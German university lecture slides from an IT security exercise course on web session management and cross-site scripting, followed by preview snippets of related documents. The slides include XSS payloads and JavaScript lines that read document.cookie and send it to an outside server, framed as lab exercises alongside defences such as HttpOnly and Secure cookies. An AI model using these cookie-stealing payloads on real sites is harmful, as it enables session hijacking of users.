IT-Sicherheit. Sicherheit von Webanwendungen 10. Dezember 2010
|
|
- Ina Sauer
- vor 5 Jahren
- Abrufe
Transkript
1 IT-Sicherheit Sicherheit von Webanwendungen 10. Dezember 2010 Prof. Dr. Matthew Smith Hergen Harnisch M.Smith/H.Harnisch, LÜ IT-Sicherheit, 10. Dezember 2010 Seite 1/19
2 1 Session-Management 2 XSS M.Smith/H.Harnisch, LÜ IT-Sicherheit, 10. Dezember 2010 Seite 2/19
3 Aufgabe Implementieren Sie eine Login-Seite und eine Sitzungsverfolgung: Session soll serverseitig in der Datenbank gespeichert werden. clientseitig soll ein Get-Request oder Hidden-Feld verwendet werden. bisherige oder andere Beispielseiten sollen nur nach erfolgtem Login unter Nennung des Nutzernamens angezeigt werden. unauthentifizierter Seitenabruf soll auf Login-Seite umlenken. (einfach, händisch, nicht unter Verwendung von PHP-Sessionsupport) Welche (Sicherheits-) Probleme treten bei diesem Ansatz auf? Knacken Sie das Session-Management Ihres Nachbarn. M.Smith/H.Harnisch, LÜ IT-Sicherheit, 10. Dezember 2010 Seite 4/19
4 Hausaufgabe 1 Führen Sie die Aufgabe auf der vorigen Seite zuende. 2 Überlegen Sie sich die Unsicherheiten Ihrer Implementation und deren Ausnutzbarkeit. (Eine Härtung Ihrer Lösung ist nicht erforderlich.) 3 Nutzen Sie statt Ihrer Eigenentwicklung das in PHP eingebaute Sessionmanagement. (Webseiten unter neuem Namen, damit Ihre Entwicklung erhalten bleibt. Nutzen Sie PHP-Sessions nicht mit Datenbank-Speicherung sondern wie voreingestellt über Dateien.) M.Smith/H.Harnisch, LÜ IT-Sicherheit, 10. Dezember 2010 Seite 5/19
5 Probleme zu einfache Session-ID ratbar Zufallszahlen, evt. Zeit/IP als Salt, Hashes (MD5,SHA) Session aus Cache fortsetzbar, auch später durch Andere Timeout einer Session ist nötig Back-Knopf im Browser: Reihenfolge der Seitenaufrufe unklar ggf. jedesmal Neugenerierung der ID Session problemlos von anderem Browser & Rechner nutzbar Browser-Typ und IP-Adresse 1 prüfen? Session-ID durch Javascript lesbar (vgl. später XSS) Session-ID steht in URL, also auch im Referrer auf Folge-Site unbedingt nach Logout Session nicht in URL und löschen Mitführung der Session-ID in GET-Variable aufwändig Cookie wäre leichter 1 nur max. erste drei Bytes wegen Proxies M.Smith/H.Harnisch, LÜ IT-Sicherheit, 10. Dezember 2010 Seite 6/19
6 PHP-Sessions Implementieren Sie die Session in Ihren Seiten mittels PHP-Session auf der Basis von Cookies (ruhig ohne Datenbank-Speicherung). Welche Sicherheitseinstellungen sind möglich? Lesen Sie die BSI-Studie Webanwendungen: M170 M220 websec/index_htm.html M.Smith/H.Harnisch, LÜ IT-Sicherheit, 10. Dezember 2010 Seite 7/19
7 Aufgabe (Vorbereitung XSS) Setzen Sie in den Session-Cookies nicht HttpOnly und nutzen Sie JavaScript, um die Session-ID zunächst clientseitig anzuzeigen alert(document.cookie); später per Webabruf an einen Server (z.b. srv24) zu übermitteln z.b. mit Layern top.load( +document.cookie); oder var xmlhttp=new XMLHttpRequest(); xmlhttp.open( GET, +document.cookie); oder document.write( <img src=" +document.cookie+ "> ); M.Smith/H.Harnisch, LÜ IT-Sicherheit, 10. Dezember 2010 Seite 8/19
8 Sessions über Cookie wohl der beste Weg der Sessionverfolgung Hinweis oder Alternative, falls Cookies abgeschaltet? Cookie an URL binden, andere dürfen nicht auslesen ( Domain ) Cookie an Verschlüsselung (https, Secure ) binden Cookie nur duch Server und nicht Skripte auslesen lassen ( HttpOnly, funktioniert nur bei neueren Browsern, Verhinderung XSS) Session-Timeout auch im Cookie setzen ( Expires ) Cookie als Session-Cookie ( Discard, löschen beim Browser-Schließen) (Cookie-Parameter vgl. beachte: Daten zur Session serverseitig speichern, nicht im Cookie M.Smith/H.Harnisch, LÜ IT-Sicherheit, 10. Dezember 2010 Seite 9/19
9 Aufgabe Untersuchen Sie z.b. mit Hilfe von curl die Session-Cookies von Stud.IP und dem Identitätsmanagement der LUH. Was sollte und was kann man verbessern? abrufen mit z.b. curl -k -c studip-cookie.txt Gegenüber 2008 hat Stud.IP inzwischen HttpOnly, nicht aber SSL-only (Stud.IP benötigt leider noch http-zugriff). M.Smith/H.Harnisch, LÜ IT-Sicherheit, 10. Dezember 2010 Seite 10/19
10 Browserseitige Vorkehrungen Browser schließen nach Nutzung (u.a. Logout bei HTTP-Authentifizierung) Konfiguration: Cookies nur für die Dauer der Sitzung speichern (Beendigung cookie-basierter Sessions) Löschen des Caches (Beendigung GET/URL-kodierter Sessions) Firefox-Plugin NoScript Eine Version setzte https-cookies automatisch auf https-only ( secure ), danach war Login z.b. bei ebay nicht möglich. Manchmal soll Login verschlüsselt sein, bei den Daten ist es aber eigentlich nicht nötig. M.Smith/H.Harnisch, LÜ IT-Sicherheit, 10. Dezember 2010 Seite 11/19
11 http/https-mixed site Firefox-Plugin Firesheep Zeigt Problem der Session-Übernahme bei http-zugriff, auch bei verschlüsseltem Login: Mithören nicht des Logins sondern des Session-Cookies bei nachfolgenden, session-authentifizierten unverschlüsselten Zugriffen. Plugin bekannt geworden für Facebook, aber auch andere Sites wie Ebay, Amazon betroffen. Grund für Betrieb von mixed-sites ist Performance/CPU-Last und z.t. auch Zertifikatshandling (evt. nur ein Knoten für Login). aus Sicherheitssicht (je nach Anforderung) nicht mehr haltbar (Performance bald keine Ausrede mehr, vgl. Intel AES-NI) M.Smith/H.Harnisch, LÜ IT-Sicherheit, 10. Dezember 2010 Seite 12/19
12 Fazit Sessions eigentlich sind Sessions in http nicht vorgesehen daher: Session-Implementierung ist eher Stückwerk / Workaround es gibt nicht die perfekte Session-Implementierung! nutzen Sie fertige Pakete, aber nicht ungefragt (ändern Sie z.b. den Namespace : in PHP session_name) häufig: Sicherheit vs. Nutzbarkeit/Browseranforderung Problematik verschärft durch XSS M.Smith/H.Harnisch, LÜ IT-Sicherheit, 10. Dezember 2010 Seite 13/19
13 XSS Idee Einschleusen von Javascript-Code oder ActiveX-Code durch einen Angreifer in eine vertraute Webseite. Problem Nutzer vertraut Webseite, die in seinem Browser aber zusätzliche, bösartige Skripte enthält, die z.b. Daten aus Formularfeldern aufzeichnen, Cookies mit Zugangsdaten auslesen / Session-Übernahme, in der Vertrauenszone Vertrauenswürdige Zone laufen, Netzzugriffe aktivieren (Scan des LANs), Zugriffsrechte des Clients nutzen (im Intranet), Client als Angreifer nutzen. M.Smith/H.Harnisch, LÜ IT-Sicherheit, 10. Dezember 2010 Seite 16/19
14 XSS (simples) Beispiel Webseite in PHP <html><body> <base href=" Hallo <?php echo $_GET["name"]?>! </body></html> gutartige URL noch nette URL name=<script>alert( Buh! )</script> M.Smith/H.Harnisch, LÜ IT-Sicherheit, 10. Dezember 2010 Seite 17/19
15 XSS IFRAME-Beispiel (Webseite wie oben) böse URL <iframe%20src=" height="0"%20width="0"%20frameborder="0"></iframe> noch nette IFrame-Seite <html><body> <base href=" <script>alert( Buh! )</script> </body></html> M.Smith/H.Harnisch, LÜ IT-Sicherheit, 10. Dezember 2010 Seite 18/19
16 XSS Aufgabe 1 Schreiben Sie eine Seite, die einen per GET übergebenen Wert darstellt (z.b. Ihre alte Personensuch-Seite). Übergeben Sie Werte mit HTML- und Javascript-Code: Zeigen Sie eine alert-meldung an Verändern Sie die Darstellung der Seite, gaukeln Sie z.b. in Ihrer Suchseite falsche Ergebnisse vor. 2 Versuchen Sie XSS-Attacken auf Ihre Login-Seite. machen Sie ein Login unmöglich übermitteln Sie die Login-Daten an Ihren Server 3 Warum ist eine Abfrage von _POST besser als _REQUEST? M.Smith/H.Harnisch, LÜ IT-Sicherheit, 10. Dezember 2010 Seite 19/19
IT-Sicherheit. Sicherheit von Webanwendungen 7. Januar 2011
IT-Sicherheit Sicherheit von Webanwendungen 7. Januar 2011 Prof. Dr. Matthew Smith Hergen Harnisch smith@rrzn.uni-hannover.de harnisch@rrzn.uni-hannover.de M.Smith/H.Harnisch, LÜ IT-Sicherheit, 7. Januar
MehrPHP-5-Zertifizierung. Block 12 Security.
PHP-5-Zertifizierung Block 12 Security Allgemeine Regeln Alle Eingaben (von außen) sind (potenziell) böse Eingaben filtern/validieren Ausgaben escapen Trauen Sie nichts von außen! GET-/POST-Daten Cookies
MehrGrundlagen Internet-Technologien INF3171
Fachbereich Informatik Informationsdienste Grundlagen Internet-Technologien INF3171 Cookies & Sessions Version 1.0 20.06.2016 aktuelles 2 Erweiterungen wir betrachten zwei Erweiterungen: Personalisierung
MehrWeb-basierte Anwendungssysteme PHP Teil 2
Web-basierte Anwendungssysteme PHP Teil 2 Prof. Dr. Armin Lehmann (lehmann@e-technik.org) Fachbereich 2 Informatik und Ingenieurwissenschaften Wissen durch Praxis stärkt Seite 1 Prof. Dr. Armin Lehmann
Mehr«/IE Cache & Cookies» Umfrage startet nicht?
Erste Hilfe «/IE Cache & Cookies» Umfrage startet nicht? Umfrage startet nicht? Wenn Sie die Umfrage starten (d.h. den Link zur Umfrage anklicken oder eingeben) sehen Sie folgendes Bild? Cache Einstellungen
MehrGrundlagen Internet-Technologien. Ajax und Cookies&Sessions Version 1.00
Ajax und Cookies&Sessions Version 1.00 28.6.2010 1 aktuelles 2 Erweiterungen wir betrachten zwei Erweiterungen: Personalisierung der Web-Verbindung durch Cookies & Sessions AJAX: Kombination von Client-
MehrPersistente Daten verwalten mit PHP
1 / 7 Doing Web Apps Persistente Daten verwalten mit PHP Autor: Rüdiger Marwein Letzte Änderung: 2009-04-03 Version: 0.7 Dieses Dokument darf mit Nennung des Autoren - frei vervielfältigt, verändert und
MehrGrundlagen Internet-Technologien INF3171
Grundlagen Internet-Technologien INF3171 ekaay AJAX Version 1.0 01.07.2013 aktuelles 2 Ajax: zunächst Abkürzung für Asynchronous JavaScript And XML Jesse J. Garrett (AdaptivePath) http://www.adaptivepath.com/publications/essays/archives/
MehrSession Management und Cookies
LMU - LFE Medieninformatik Blockvorlesung Web-Technologien Wintersemester 2005/2006 Session Management und Cookies Max Tafelmayer 1 Motivation HTTP ist ein zustandsloses Protokoll Je Seitenaufruf muss
MehrGrundlagen Internet-Technologien INF3171
Grundlagen Internet-Technologien INF3171 Cookies & Sessions & ekaay AJAX Version 1.0 27.06.2011 aktuelles Internet Corporation for Assigned Names and Numbers (ICANN): ab 2012 beliebige Toplevel-Domains
MehrSicherheitslücken in Webanwendungen -
Manuel Ziegler Web Hacking Sicherheitslücken in Webanwendungen - Lösungswege für Entwickler Mit Playground im Internet HANSER Vorwort IX 1 Sicherheitsprobleme im Internet und deren Folgen 1 1.1 Sicherheitsprobleme
Mehr1 Allgemein. 2 1st und 3rd Party Cookies. 2.1 Nutzung einer eigenen Track Domain
1 Webtrekk Cookies Inhalt 2 1 Allgemein Cookies sind Textinformationen, die beim Besuch einer Webseite gesetzt werden können und daraufhin auf dem Gerät/Rechner des Besuchers gespeichert werden. Jedes
MehrWie sichert man APEX-Anwendungen gegen schädliche Manipulationen und unerwünschte Zugriffe ab?
APEX aber sicher Wie sichert man APEX-Anwendungen gegen schädliche Manipulationen und unerwünschte Zugriffe ab? Carola Berzl BASEL BERN BRUGG GENF LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR.
MehrWeb Application Security: SQL-injection, Cross Site Scripting -- w3af
Web Application Security: SQL-injection, Cross Site Scripting -- w3af 1 Web 2.0 Application und Angriffspunkte Grundlagen: SQL SQL-injection Cross Site Scripting Web Application Scans mit w3af 2 Eine Web
MehrSessions mit PHP. Annabell Langs 2004. Sessions in PHP - Annabell Langs 1
Sessions mit PHP Annabell Langs 2004 Sessions in PHP - Annabell Langs 1 Sessions» Inhaltsverzeichnis Wozu Sessions? 3 Wie funktionieren Sessions? 5 Wie kann ich die Session-ID übergeben? 8 Sicherheit 9
MehrBrowsereinstellungen
Empfehlungen Stand: 13.06.2008 - MANN+HUMMEL GMBH Bearbeiter: TÜ Seite 1 von 12 Allgemeine Empfehlung und Hinweis Wir empfehlen den Microsoft Internet Explorer in der aktuellen Version (derzeit 7) und
MehrSicherheit in Webanwendungen CrossSite, Session und SQL
Sicherheit in Webanwendungen CrossSite, Session und SQL Angriffstechniken und Abwehrmaßnahmen Mario Klump Die Cross-Site -Familie Die Cross-Site-Arten Cross-Site-Scripting (CSS/XSS) Cross-Site-Request-Forgery
MehrInternet-Technologien
Internet-Technologien PHP Workshop Bau eines Gästebuches Bisher: Heute: Clientseitiges Skripting (Bsp.: JavaScript) Ausführung von Programm-Code auf dem Client-Rechner Entlastung des Server-Rechners ++
MehrBrowsereinstellungen. Inhaltsverzeichnis. SLF ebanking
Inhaltsverzeichnis 1. Internet Explorer... 2 1.1. IE Version 5.0 / 5.5 / 6.0... 2 1.2. IE Version 6.0 ServicePack1... 5 1.3. IE Version 6.0.2900 xpsp2 unter XP... 7 1.4. IE Version 7.0... 9 2. Mozilla...
MehrBegrüßung & zur Sicherheitslage
Begrüßung & zur Sicherheitslage Sicherheitstage SS 2007 Hergen Harnisch harnisch@rrzn.uni-hannover.de 20.06.2007 Hergen Harnisch Sicherheitslage 20.06.2007 Folie 2 Programm Mittwoch 20.6. 09:15-09:45 IT
MehrÜbergreifende Session auf bahn.de Verwendung von Session-Cookies
Übergreifende Session auf bahn.de Verwendung von Session-Cookies DB Vertrieb GmbH Vertrieb Geschäftskunden 1 Joachim Friederich 13.06.2016 Bis Juni 2016 soll die Umstellung der seitenübergreifenden Session
MehrOWASP Top 10. im Kontext von Magento. Mittwoch, 21. November 12
OWASP Top 10 im Kontext von Magento 1 Ich Fabian Blechschmidt (@Fabian_ikono) blechschmidt@fabianblechschmidt.de PHP seit 2004 Freelancer seit 2008 Magento seit 2011 Certified Magento Developer spielt
MehrWie funktioniert das WWW? Sicher im WWW
Wie funktioniert das WWW? Sicher im WWW Der normale Aufruf 1. Browserprogramm starten 2. Adresse eintippen, z.b. : ich-hab-doch-nichts-zu-verbergen.de 3. Der Browser ändert die Adresse auf: http://ich-hab-doch-nichts-zu-verbergen.de/
MehrVoraussetzung für die Nutzung des KOCH-Portals ist ein aktueller Webbrowser mit installiertem Adobe Flash Player Plugin.
Voraussetzung für die Nutzung des KOCH-Portals ist ein aktueller Webbrowser mit installiertem Adobe Flash Player Plugin. Weiterhin wird für die Darstellung der Dokumente ein PDF-Viewer benötigt. Es wird
MehrUm Ihren neuen»counter«(besucherzähler) auf einer Webseite zu installieren, benötigen Sie folgenden HTML-Code:
Anleitung zum Counter Beim Kopieren der Code-Beispiele in dieser Anleitung ist die beispielhafte Counter-ID 0000000000 durch die eigene zehnstellige Counter-ID des jeweiligen Zählers zu ersetzen. Einbau
MehrNetzwerksicherheit Musterlösung Übungsblatt 11: TOR und Websicherheit
Institut für Informatik Philipp Hagemeister Netzwerksicherheit Musterlösung Übungsblatt 11: TOR und Websicherheit 1 TOR Installieren Sie TOR auf ihrem System. Rufen Sie über eine anonymisierte HTTP-Verbindung
MehrInternettechnologien. Sommersemester Individuelle Aufgaben für die PVL im Fach Internettechnologien
Internettechnologien Sommersemester 2017 Individuelle Aufgaben für die PVL im Fach Internettechnologien Aufgabe1: Darstellung einer Weltkarte mit Anzeige besuchter Orte einer Person. Die besuchten Orte
MehrErste Hilfe. «/IE Cache & Cookies» Logout, alte Seiten erscheinen, Erfasstes verschwindet?
Erste Hilfe «/IE Cache & Cookies» Logout, alte Seiten erscheinen, Erfasstes verschwindet? Cache Einstellungen Im Internet Explorer von Microsoft wie auch in anderen Browsern (zum Beispiel Firefox) gibt
Mehrweb266.de 1/6 WordPress auf https umstellen
web266.de 1/6 WordPress auf https umstellen Hinweis: Diese Anleitung richtet sich an erfahrene User! Vor dieser Arbeit ist ein vollständiges Backup aller Daten und der Datenbank dringend empfohlen! Zur
MehrHOLIDAY-FERIENWOHNUNGEN.COM Anleitung zur Aktivierung von Java Script und Informationen über Cookies
HOLIDAY-FERIENWOHNUNGEN.COM Anleitung zur Aktivierung von Java Script und Informationen über Cookies Für die Eintragung Ihrer Daten in unsere Datenbank sind aus technischen Gründen einige wenige Voraussetzungen
Mehr2. Interaktive Web Seiten. action in Formularen. Formular. Superglobale Variablen $ POST, $ GET und $ REQUEST. GET und POST
2. Interaktive Web Seiten GET und POST Die Übertragungsmethoden GET und POST sind im http Protokoll definiert: POST: gibt an, dass sich weitere Daten im Körper der übertragenen Nachricht befinden: z.b.
MehrDestructive AJAX. Stefan Proksch Christoph Kirchmayr
Destructive AJAX Stefan Proksch Christoph Kirchmayr AJAX-Einführung Asynchronous JavaScript And XML Clientseitiger JavaScript-Code Asynchrone Kommunikation XML DOM Klassisches Client-Server Modell AJAX-Modell
Mehr4. Februar 2008 Klausur EWA
Hochschule Darmstadt fbi Fachbereich Informatik Klausur Entwicklung webbasierter Anwendungen (EWA), WS 07/08 4. Februar 2008 Klausur EWA Name Vorname Matrikelnummer Note Aufgabe max. Punkte erreichte Punkte
MehrGrundlagen Internet-Technologien. Serverseitige Web-Programmierung mit CGI, Teil II: Perl im Web Version 1.11
Serverseitige Web-Programmierung mit CGI, Teil II: Perl im Web Version 1.11 31.5.2010 1 aktuelles twitter: Mikroblogging seit 2006 typischer Dienst für Web 2.0 eigene twitter-api Nutzung in Massenmedien,
MehrWEBINAR: HTTPS, ZERTIFIKATE, GRÜNE URLS. Trügerische Sicherheit im Internet
WEBINAR: HTTPS, ZERTIFIKATE, GRÜNE URLS Trügerische Sicherheit im Internet HERZLICH WILLKOMMEN Die Moderatoren Andreas Krenz Client Relationship Manager Fragen über Chat Frank Pöhler Senior Consultant
Mehr2. WWW-Protokolle und -Formate
2. WWW-Protokolle und -Formate Inhalt: HTTP, allgemeiner syntaktischer Aufbau Wichtige Methoden des HTTP-Protokolls Aufbau von Web-Applikationen unter Nutzung von HTTP, HTML, DOM XML, XML-DTD und XML-Schema
MehrAdvanced Web Hacking. Matthias Luft Security Research mluft@ernw.de
Advanced Web Hacking Matthias Luft Security Research mluft@ernw.de ERNW GmbH. Breslauer Str. 28. D-69124 Heidelberg. www.ernw.de 6/23/2010 1 ERNW GmbH Sicherheitsdienstleister im Beratungs- und Prüfungsumfeld
MehrNerdball Ein automatischer IRC Image Collector
Ein automatischer IRC Image Collector Aleksander»watz«Paravac Nerd2Nerd watz@nerd2nerd.org http://www.nerd2nerd.org Übersicht 1 Wieso und warum? Was ist? HOWTO 2 Umsetzung The Choice is yours Client-Server
MehrAktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen
FAEL-Seminar Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte
MehrDatenschutzerklärung digipen technologies GmbH ein Unternehmen der EITCO
Datenschutzerklärung digipen technologies GmbH ein Unternehmen der EITCO Version 1.1 Stand: 2017-05-11 1 Dokumentenhistorie Version Datum Verfasser Änderung Kapitel 0.1 30.04.2015 Kai Hofmann Dokument
MehrTypen personenbezogener Daten innerhalb der Kategorie
C. Kategorien und Quellen personenbezogener Daten Wir verarbeiten die folgenden (Kategorien von) personenbezogenen Daten: Protokolldaten, die beim Aufruf der Website über das Hypertext-Übertragungsprotokoll
MehrAPEX Datenverwaltung Wo sind die Daten gerade? Dr. Gudrun Pabst
APEX Datenverwaltung Wo sind die Daten gerade? Dr. Gudrun Pabst Basel Bern Lausanne Zürich Düsseldorf Frankfurt/M. Freiburg i. Br. Hamburg München Stuttgart Wien Voraussetzungen Alles hier gezeigte benötigt
MehrDatenschutzerklärung. 1. Datenschutz auf einen Blick. 2. Allgemeine Hinweise und Pflichtinformationen. Allgemeine Hinweise
Datenschutzerklärung 1. Datenschutz auf einen Blick Allgemeine Hinweise Die folgenden Hinweise geben einen einfachen Überblick darüber, was mit Ihren personenbezogenen Daten passiert, wenn Sie unsere Website
MehrPolitisch oder ideell interessante Alternativen zu den Standard-Diensten und Grundregeln zum Datenschutz. Silke Meyer
Das Das Politisch oder ideell interessante n zu den Standard-Diensten und silke@silkemeyer.net web 2.0 Frauen am Netz, Berlin, 22.01.2011 Das Überblick 1 Kurze 2 3 Das Kritikpunkte Client-Server-Struktur
MehrDie Universität Passau als Pilotnutzer der Konfigurationsschnittstelle ein Erfahrungsbericht
Die Universität Passau als Pilotnutzer der Konfigurationsschnittstelle ein Erfahrungsbericht 11. Juni 2012 Kassel Dr. Ulrich Zukowski, Andreas Mayer Universität Passau Zielstellung Einführung eines Forschungsinformationssystems
MehrAnmeldung am FRITZ!Box Webinterface
Anmeldung am FRITZ!Box Webinterface Login-Verfahren und Session-IDs im FRITZ!Box Webinterface Die Anmeldung an einer FRITZ!Box kann grundsätzlich auf drei Arten erfolgen: Mit Benutzernamen und Kennwort
MehrSoftwaresicherheit. Eine Präsentation von Benedikt Streitwieser und Max Göttl. Einführung Kryptographie und IT-Sicherheit
Softwaresicherheit Eine Präsentation von Benedikt Streitwieser und Max Göttl Einführung Kryptographie und IT-Sicherheit Gliederung Einleitung: Was ist Softwaresicherheit Populäre Beispiele Anforderungen
MehrDatenschutzerklärung digipen technologies GmbH
Datenschutzerklärung digipen technologies GmbH Version 1.0 Stand: 2016-09-21 1 Dokumentenhistorie Version Datum Verfasser Änderung Kapitel 0.1 30.04.2015 Kai Hofmann Dokument angelegt (txt) alle 0.2 24.06.2015
MehrWALL&KOLLEGEN RECHTSANWÄLTE AVVOCATI BARRISTER-AT-LAW MÜNCHEN INNSBRUCK BOZEN
WALL&KOLLEGEN RECHTSANWÄLTE AVVOCATI BARRISTER-AT-LAW MÜNCHEN INNSBRUCK BOZEN Die 7 häufigsten Fehler im IT-Security- Management bei Webanwendungen (nach OWASP) München, 11.10.2011 c1 Folie 3 c1 Ich habe
MehrInhaltsverzeichnis. Einleitung
Einleitung 1 Rapid Web Development 1.1 Alle reden von Web 2.0 1.2 Was ist ein Web-Development-Framework? 1.3 Die zentralen Komponenten von TurboGears Python Kid-Templating CherryPy SQLObject Weitere Komponenten
MehrKlausur im Modul: Softwaretechnik (SWT) - WEB
Fachbereich Betriebswirtschaft Bachelor Information Management Klausur im Modul: Softwaretechnik (SWT) - WEB Dipl.-Ing. Klaus Knopper 5.1.2017 Hinweis: Bitte schreiben Sie auf das Deckblatt und auf jede
MehrTechnische Verfahren zur anonymen Nutzung des Internet und deren Folgen für Strafverfolgung
Technische Verfahren zur anonymen Nutzung des Internet und deren Folgen für Strafverfolgung Prof. Dr. Universität Regensburg Lehrstuhl Management der Informationssicherheit http://www-sec.uni-regensburg.de/
Mehraibrowser Ausgabe
aibrowser Ausgabe 17.01.2018 Inhalt 1 Start und Menü-Balken...2 Einstellungen...3 General...3 Autologin...4 Info...5 Übergabe der Scan-Daten an den aibrowser...6 Methode 1: JavaScript Function Call...6
MehrWer ist verantwortlich für die Datenerfassung auf dieser Website?
Datenschutzerklärung 1. Datenschutz auf einen Blick Allgemeine Hinweise Die folgenden Hinweise geben einen einfachen Überblick darüber, was mit Ihren personenbezogenen Daten passiert, wenn Sie unsere Website
MehrDATEN- SCHUTZ DATENSCHUTZRICHTLINIEN
DATEN- SCHUTZ DATENSCHUTZRICHTLINIEN KOMAX AG Gültig ab 1. November 2015 GESCHÄFTS- BEDINGUNGEN INHALTSVERZEICHNIS 1 Geltungsbereich und Zweck 3 2 Datenerhebung 3 3 Zweck der Datenerhebung und 3 Verwendung
MehrWebtechnologien Teil 2: Hypertext Transfer Protokoll (Wiederholung aus Rechnernetze)
Webtechnologien Teil 2: Hypertext Transfer Protokoll (Wiederholung aus Rechnernetze) 03.10.16 1 Literatur [2-1] Gourley, David; Totty, Brian: HTTP. The definitive Guide. O'Reilly, 2002 [2-2] Badach, Anatol;
MehrDie neue LMS Plattform
Die neue LMS Plattform Inhalt Die neue LMS Plattform... 2 Neueinstieg und Vorbereitungen... 3 Auswahl des Clients... 4 Internet Explorer:... 4 Installationsanleitung Citrix Receiver... 5 Feststellen, welcher
MehrLinux-Camp: Linux als Server am Beispiel LAMP
Linux-Camp: Linux als Server am Beispiel LAMP Linux, Apache, MySQL, PHP mit Ubuntu Version 8.04 Inhalt LAMP-Komponenten LAMP-Komponenten installieren, konfigurieren und prüfen Apache Webserver PHP5 MySQL
MehrProjektarbeit Reitvereinmanagementsystem (RVMS) Dokumentation der Anmeldefunktionen
Projektarbeit Reitvereinmanagementsystem (RVMS) Dokumentation der Anmeldefunktionen Seite 1 von 17 INHALTSVERZEICHNIS Anmeldung zu den einzelnen Modulen...3 Schritt 1: Anmeldung... 3 Schritt 2: Modulmöglichkeiten...
MehrSicherheit in Webanwendungen
Beckmann & Partner CONSULT Artikel vom 8. Januar 2016 Sicherheit in Webanwendungen Das Thema Sicherheit ist heute wichtiger als je zuvor und sollte bei einem Softwareprojekt bereits von Anfang an bedacht
Mehr7/5.10 Cookie-Diebstahl und Cookie-Sicherheit
Bedrohungen aus dem Internet Teil 7/5.10 Seite 1 7/5.10 Cookie-Diebstahl und Cookie-Sicherheit Session-Cookies verhindern, dass man sich nach dem Login auf einer Website wiederholt anmelden muss. Werden
MehrUnified-E Standard WebHttp Adapter
Unified-E Standard WebHttp Adapter Version: 1.5.0.2 und höher Juli 2017 Inhalt 1 Allgemeines... 2 2 Adapter-Parameter in Unified-E... 2 3 Symbolische Adressierung... 3 3.1 ReadValues-Methode... 4 3.2 WriteValues
MehrAPEX Datenverwaltung Wo sind die Daten gerade?
APEX Datenverwaltung Wo sind die Daten gerade? Dr. Gudrun Pabst Trivadis GmbH München Schlüsselworte: APEX, Sessionverwaltung, Dynamic Actions Einleitung Eine APEX-Anwendung wird erst durch zusätzliche
MehrBMW Financial Services. Freude am Fahren GOOGLE CHROME INTERNET-BROWSER EINSTELLUNGEN OPTIMIEREN.
BMW Financial Services Freude am Fahren GOOGLE CHROME 62.0.32 INTERNET-BROWSER EINSTELLUNGEN OPTIMIEREN. GOOGLE CHROME 62.0.32 INTERNET-BROWSER EINSTELLUNGEN OPTIMIEREN. Inhalt. Seite Allgemeine Informationen
MehrSicher im Internet. PC-Treff-BB. Peter Rudolph
Sicher im Internet Sicher im Internet, Folie 1 von 15 Peter Rudolph 12.12.2015 Risiken Sicher im Internet, Folie 2 von 15 Viren böswilliges Programm automatische Verbreitung (Ansteckung) Ziel: PC funktionsuntüchtig
MehrSicherheit und der Ajax-Client. Carsten Eilers
Sicherheit und der Ajax-Client Carsten Eilers Vorstellung Berater für IT-Sicherheit Autor About Security Standpunkt Sicherheit Buch Ajax Security und anderes... Schwachstellen-Datenbank Security Aktuell
MehrSicherheit und der Ajax-Client. Carsten Eilers
Sicherheit und der Ajax-Client Carsten Eilers Vorstellung Berater für IT-Sicherheit Autor About Security Standpunkt Sicherheit Buch Ajax Security und anderes... Schwachstellen-Datenbank Security Aktuell
MehrZusammenfassung Web-Security-Check ZIELSYSTEM
Zusammenfassung Web-Security-Check ZIELSYSTEM für KUNDE (nachfolgend Auftraggeber genannt) von secudor GmbH Werner-von-Siemensstraße 6 Gebäude 9 86159 Augsburg (nachfolgend Auftragnehmer genannt) Inhalt
Mehrbea Client-Security herunterladen und installieren unter Windows
bea Client-Security herunterladen und installieren unter Windows Die Links zum Download der bea Client-Security finden Sie auf der Startseite unter https:// www.bea-brak.de. Das Installationsprogramm für
MehrDienste, Bereich Informatik & Telekommunikation Fernzugriff über Basic Access
Dienste, Bereich Informatik & Telekommunikation Fernzugriff über Basic Access http://www.insel.ch/de/login/ Raphael Hodel 22. November 2016 1 Inhaltsverzeichnis 1. Einleitung... 3 2. Anforderungen... 3
MehrLücke in der JavaScript-Engine von ios [ ]
Lücke in der JavaScript-Engine von ios [07.11.2011] Kombination aus trojanischem Pferd, Nachladen von Schadcode und fehlerhafter JavaScript-Implementierung. Demo-App von Charlie Miller für Konferenz SyScan
MehrInformationen zum LANCOM ES-2126+
Informationen zum LANCOM ES-2126+ Copyright (c) 2002-2013 LANCOM Systems GmbH, Würselen (Germany) Die LANCOM Systems GmbH übernimmt keine Gewähr und Haftung für nicht von der LANCOM Systems GmbH entwickelte,
MehrWeb-basierte Anwendungen: Übung 04, Meilenstein 2
7363 - Web-basierte Anwendungen: Übung 04, Meilenstein 2 Umgang mit dynamischen Webseiten: CGI-Skripte, FCGI-Varianten, Server Side Includes (SSI) 13.04.2005 H. Werntges, FB Informatik, FH Wiesbaden 1
MehrSenatsverwaltung für Stadtentwicklung und Wohnen
Browsereinstellungen für Geobasisdaten Online Stand: 26. April 2018 1. Allgemein... 1 1.1. Browserversionen... 2 1.2. PopUp-Blocker... 2 1.3. JavaScript... 2 1.4. Cookies... 2 2. Internet Explorer... 3
MehrPHP eine Einführung. Dipl.-Inf. Frank Hofmann. 18. November Potsdam
PHP eine Einführung Dipl.-Inf. Frank Hofmann Potsdam 18. November 2007 Dipl.-Inf. Frank Hofmann (Potsdam) PHP eine Einführung 18. November 2007 1 / 14 Allgemeines zum Kurs Zielsetzung des Kurses Erlernen
MehrLIVING BUSINESS AG. Getting Started - centrexx API ONE STEP AHEAD. Guide zum Umgang und Umfang der 3D-centrexX API in der Version 1.
Getting Started - centrexx API in der Version 1. Verantwortlich: Michael Angermaier Autor: Michael Angermaier Version: 0.1 ONE STEP AHEAD LIVING BUSINESS AG Seite 1 von 10 Inhaltsverzeichnis 1 Vorwort
MehrWie registriere ich Drivve Image manuell auf einem OKI-Gerät? (OKI-Edition)
Wie registriere ich Drivve Image manuell auf einem OKI-Gerät? (OKI-Edition) Knowledge base article #6531 Voraussetzungen Um Drivve Image manuell auf einem OKI-Gerät zu registrieren, müssen folgende Bedingungen
MehrSIWECOS KMU Webseiten-Check 2018
